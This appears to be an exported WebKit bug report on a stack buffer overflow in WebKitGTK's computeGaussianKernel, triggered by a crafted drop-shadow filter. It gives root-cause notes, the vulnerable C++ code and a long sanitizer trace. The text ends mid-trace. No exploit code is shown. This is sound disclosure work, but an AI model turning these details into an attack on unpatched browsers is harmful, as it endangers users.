265659 2023-12-01 05:29:27 -0800 [TextureMapper][GTK] WebKit GTK computeGaussianKernel Stack Buffer Overflow Vulnerability for drop-shadow filter 2023-12-14 16:11:58 -0800 1 1 1 Unclassified Security Security WebKit Local Build PC Linux RESOLVED FIXED Gtk, InRadar P3 Normal --- 1 pswpsw0177 jbedard bfulgham cgarcia don.olmstead fujii magomez mcatanzaro webkit-bug-importer oldest_to_newest 1996191 0 468832 pswpsw0177 2023-12-01 05:29:27 -0800 Created attachment 468832 PoC file 1. Vulnerability Title a. WebKit GTK computeGaussianKernel Stack Buffer Overflow Vulnerability 2. High-level overview of the vulnerability and the possible effect of using it 1. The Stack Buffer Overflow Vulnerability exists in WebKit GTK computeGaussianKernel function. 2. An Attacker must open a arbitrary generated HTML file to exploit this vulnerability. 3. Exact product that was found to be vulnerable including complete version information 1. Ubuntu 22.04.3 LTS 4. Root Cause Analysis (recommended but not required) 1. The vulnerability exists when referring to a stack memory area in the function `computeGaussianKernel` . 2. Refer to the `radius` in the function `computeGaussianKernel`. This causes Stack Buffer Overflow. 3. The lack of size validation for radius leads to a stack buffer overflow. ```cpp static unsigned blurRadiusToKernelHalfSize(float radius) { return ceilf(radius * 2 + 1); } static int computeGaussianKernel(float radius, std::array<float, SimplifiedGaussianKernelMaxHalfSize>& kernel, std::array<float, SimplifiedGaussianKernelMaxHalfSize>& offset) { unsigned kernelHalfSize = blurRadiusToKernelHalfSize(radius); ASSERT(kernelHalfSize <= GaussianKernelMaxHalfSize); float fullKernel[GaussianKernelMaxHalfSize]; fullKernel[0] = 1; float sum = fullKernel[0]; for (unsigned i = 1; i < kernelHalfSize; ++i) { fullKernel[i] = gauss(i, radius); //====> crash here sum += 2 * fullKernel[i]; } float scale = 1 / sum; for (unsigned i = 0; i < kernelHalfSize; ++i) fullKernel[i] *= scale; unsigned simplifiedKernelHalfSize = kernelHalfSizeToSimplifiedKernelHalfSize(kernelHalfSize); kernel[0] = fullKernel[0]; for (unsigned i = 1; i < simplifiedKernelHalfSize; i++) { unsigned offset1 = 2 * i - 1; unsigned offset2 = 2 * i; if (offset2 >= kernelHalfSize) { kernel[i] = fullKernel[offset1]; offset[i] = offset1; break; } kernel[i] = fullKernel[offset1] + fullKernel[offset2]; offset[i] = (fullKernel[offset1] * offset1 + fullKernel[offset2] * offset2) / kernel[i]; } return simplifiedKernelHalfSize; } ``` ```cpp ================================================================= ==237950==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f4bb2926dec at pc 0x7f4c093cc093 bp 0x7f4bb2926d90 sp 0x7f4bb2926d88 WRITE of size 4 at 0x7f4bb2926dec thread T9 (eadedCompositor) #0 0x7f4c093cc092 in WebCore::computeGaussianKernel(float, std::array<float, 6ul>&, std::array<float, 6ul>&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:359:23 #1 0x7f4c093cc092 in WebCore::TextureMapperGL::drawBlurred(WebCore::BitmapTexture const&, WebCore::FloatRect const&, float, WebCore::TextureMapperGL::Direction, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:872:36 #2 0x7f4c093cf333 in WebCore::TextureMapperGL::applyDropShadowFilter(WTF::RefPtr<WebCore::BitmapTexture, WTF::RawPtrTraits<WebCore::BitmapTexture>, WTF::DefaultRefDerefTraits<WebCore::BitmapTexture> >, WebCore::DropShadowFilterOperation const&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:1058:13 #3 0x7f4c093d18f1 in WebCore::TextureMapperGL::applyFilter(WTF::RefPtr<WebCore::BitmapTexture, WTF::RawPtrTraits<WebCore::BitmapTexture>, WTF::DefaultRefDerefTraits<WebCore::BitmapTexture> >, WTF::RefPtr<WebCore::FilterOperation const, WTF::RawPtrTraits<WebCore::FilterOperation const>, WTF::DefaultRefDerefTraits<WebCore::FilterOperation const> > const&, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:1140:16 #4 0x7f4c093ba606 in WebCore::BitmapTextureGL::applyFilters(WebCore::TextureMapper&, WebCore::FilterOperations const&, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/BitmapTextureGL.cpp:180:28 #5 0x7f4c093aef34 in WebCore::TextureMapperLayer::paintIntoSurface(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:680:40 #6 0x7f4c093ae29f in WebCore::TextureMapperLayer::paintSelfAndChildrenWithIntermediateSurface(WebCore::TextureMapperPaintOptions&, WebCore::IntRect const&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:719:9 #7 0x7f4c093ada93 in WebCore::TextureMapperLayer::paintSelfChildrenFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:653:17 #8 0x7f4c093ac7d2 in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:744:9 #9 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9 #10 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16 #11 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5 #12 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9 #13 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9 #14 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16 #15 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5 #16 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9 #17 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9 #18 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16 #19 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5 #20 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9 #21 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9 #22 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16 #23 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5 #24 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9 #25 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9 #26 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16 #27 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5 #28 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9 #29 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9 #30 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16 #31 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5 #32 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9 #33 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9 #34 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16 #35 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5 #36 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9 #37 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9 #38 0x7f4c093a5810 in WebCore::TextureMapperLayer::paint(WebCore::TextureMapper&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:178:5 #39 0x7f4c0844ed7c in WebKit::CoordinatedGraphicsScene::paintToCurrentGLContext(WebCore::TransformationMatrix const&, WebCore::FloatRect const&, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/CoordinatedGraphicsScene.cpp:76:23 #40 0x7f4c0846e585 in WebKit::ThreadedCompositor::renderLayerTree() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:251:14 #41 0x7f4c08472c5f in WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:60:68 #42 0x7f4c08472c5f in WTF::Detail::CallableWrapper<WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:53:39 #43 0x7f4c0845b46f in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:82:35 #44 0x7f4c0845b46f in WebKit::CompositingRunLoop::updateTimerFired() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/CompositingRunLoop.cpp:179:5 #45 0x7f4c0846af2b in void std::__invoke_impl<void, void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&>(std::__invoke_memfun_deref, void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:74:14 #46 0x7f4c0846af2b in std::__invoke_result<void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&>::type std::__invoke<void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&>(void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:96:14 #47 0x7f4c0846af2b in void std::_Bind<void (WebKit::CompositingRunLoop::* (WebKit::CompositingRunLoop*))()>::__call<void, 0ul>(std::tuple<>&&, std::_Index_tuple<0ul>) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/functional:420:11 #48 0x7f4c0846af2b in void std::_Bind<void (WebKit::CompositingRunLoop::* (WebKit::CompositingRunLoop*))()>::operator()<void>() /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/functional:503:17 #49 0x7f4c0846af2b in WTF::Detail::CallableWrapper<std::_Bind<void (WebKit::CompositingRunLoop::* (WebKit::CompositingRunLoop*))()>, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:53:39 #50 0x7f4c07f0b0b3 in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:82:35 #51 0x7f4c07f0b0b3 in WTF::RunLoop::Timer::fired() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/RunLoop.h:195:33 #52 0x7f4c04b07ed8 in WTF::RunLoop::TimerBase::TimerBase(WTF::RunLoop&)::$_3::operator()(void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:177:16 #53 0x7f4c04b07ed8 in WTF::RunLoop::TimerBase::TimerBase(WTF::RunLoop&)::$_3::__invoke(void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:169:43 #54 0x7f4c04b05433 in WTF::RunLoop::$_0::operator()(_GSource*, int (*)(void*), void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:53:28 #55 0x7f4c04b05433 in WTF::RunLoop::$_0::__invoke(_GSource*, int (*)(void*), void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:45:5 #56 0x7f4bfcb20c43 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x55c43) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b) #57 0x7f4bfcb76257 (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0xab257) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b) #58 0x7f4bfcb202b2 in g_main_loop_run (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x552b2) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b) #59 0x7f4c04b069c8 in WTF::RunLoop::run() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:108:9 #60 0x7f4c0499e9c8 in WTF::RunLoop::create(char const*, WTF::ThreadType, WTF::Thread::QOS)::$_1::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/RunLoop.cpp:114:9 #61 0x7f4c0499e9c8 in WTF::Detail::CallableWrapper<WTF::RunLoop::create(char const*, WTF::ThreadType, WTF::Thread::QOS)::$_1, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Function.h:53:39 #62 0x7f4c049a97ff in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Function.h:82:35 #63 0x7f4c049a97ff in WTF::Thread::entryPoint(WTF::Thread::NewThreadContext*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Threading.cpp:250:5 #64 0x7f4c04b147a8 in WTF::wtfThreadEntryPoint(void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/posix/ThreadingPOSIX.cpp:242:5 #65 0x7f4bfc494ac2 in start_thread nptl/./nptl/pthread_create.c:442:8 #66 0x7f4bfc526a3f misc/../sysdeps/unix/sysv/linux/x86_64/clone3.S:81 Address 0x7f4bb2926dec is located in stack of thread T9 (eadedCompositor) at offset 76 in frame #0 0x7f4c093cbcbf in WebCore::TextureMapperGL::drawBlurred(WebCore::BitmapTexture const&, WebCore::FloatRect const&, float, WebCore::TextureMapperGL::Direction, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:856 This frame has 6 object(s): [32, 76) 'fullKernel.i' (line 354) <== Memory access at offset 76 overflows this variable [112, 120) 'program' (line 857) [144, 168) 'kernel' (line 870) [208, 232) 'offset' (line 871) [272, 400) 'textureBlurMatrix' (line 877) [432, 560) 'ref.tmp53' (line 895) HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) Thread T9 (eadedCompositor) created by T0 here: #0 0x560a95b0a5dc in pthread_create (/home/fuzz/Downloads/webkitgtk-2.41.92/build/libexec/webkit2gtk-4.0/WebKitWebProcess+0x8a5dc) (BuildId: 993abfac4fe138f0c15349dccc801d74c501b984) #1 0x7f4c04b14593 in WTF::Thread::establishHandle(WTF::Thread::NewThreadContext*, std::optional<unsigned long>, WTF::Thread::QOS) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/posix/ThreadingPOSIX.cpp:292:17 #2 0x7f4c049a9e31 in WTF::Thread::create(char const*, WTF::Function<void ()>&&, WTF::ThreadType, WTF::Thread::QOS) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Threading.cpp:266:32 #3 0x7f4c0499c7d8 in WTF::RunLoop::create(char const*, WTF::ThreadType, WTF::Thread::QOS) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/RunLoop.cpp:111:5 #4 0x7f4c0845b0b9 in WebKit::CompositingRunLoop::CompositingRunLoop(WTF::Function<void ()>&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/CompositingRunLoop.cpp:43:17 #5 0x7f4c0846b26d in std::_MakeUniq<WebKit::CompositingRunLoop>::__single_object std::make_unique<WebKit::CompositingRunLoop, WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0>(WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/unique_ptr.h:962:34 #6 0x7f4c0846b26d in decltype(auto) WTF::makeUnique<WebKit::CompositingRunLoop, WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0>(WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0&&) /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/StdLibExtras.h:596:12 #7 0x7f4c0846b26d in WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:60:28 #8 0x7f4c0846aff4 in WebKit::ThreadedCompositor::create(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:54:26 #9 0x7f4c09262071 in WebKit::LayerTreeHost::LayerTreeHost(WebKit::WebPage&, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/CoordinatedGraphics/LayerTreeHost.cpp:82:20 #10 0x7f4c0925b38d in std::_MakeUniq<WebKit::LayerTreeHost>::__single_object std::make_unique<WebKit::LayerTreeHost, WebKit::WebPage&, unsigned long>(WebKit::WebPage&, unsigned long&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/unique_ptr.h:962:34 #11 0x7f4c0925b38d in decltype(auto) WTF::makeUnique<WebKit::LayerTreeHost, WebKit::WebPage&, unsigned long>(WebKit::WebPage&, unsigned long&&) /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/StdLibExtras.h:596:12 #12 0x7f4c0925b38d in WebKit::DrawingAreaCoordinatedGraphics::enterAcceleratedCompositingMode(WebCore::GraphicsLayer*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/CoordinatedGraphics/DrawingAreaCoordinatedGraphics.cpp:596:27 #13 0x7f4c0925afda in WebKit::DrawingAreaCoordinatedGraphics::enterAcceleratedCompositingModeIfNeeded() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/CoordinatedGraphics/DrawingAreaCoordinatedGraphics.cpp:293:5 #14 0x7f4c0916d290 in WebKit::WebPage::WebPage(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/WebPage.cpp:799:24 #15 0x7f4c0916831e in WebKit::WebPage::create(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/WebPage.cpp:492:31 #16 0x7f4c08c9203c in WebKit::WebProcess::createWebPage(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebProcess.cpp:856:21 #17 0x7f4c07912bd1 in auto void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...)::operator()<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>(auto&&...) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/HandleMessage.h:136:13 #18 0x7f4c07912bd1 in WebKit::WebProcess std::__invoke_impl<void, void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>(std::__invoke_other, WebKit::WebProcess&&, WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>&&, WebKit::WebPageCreationParameters&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:61:14 #19 0x7f4c07912bd1 in std::__invoke_result<WebKit::WebProcess, WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>::type std::__invoke<void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>(WebKit::WebProcess&&, WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>&&, WebKit::WebPageCreationParameters&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:96:14 #20 0x7f4c07912bd1 in decltype(auto) std::__apply_impl<void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, 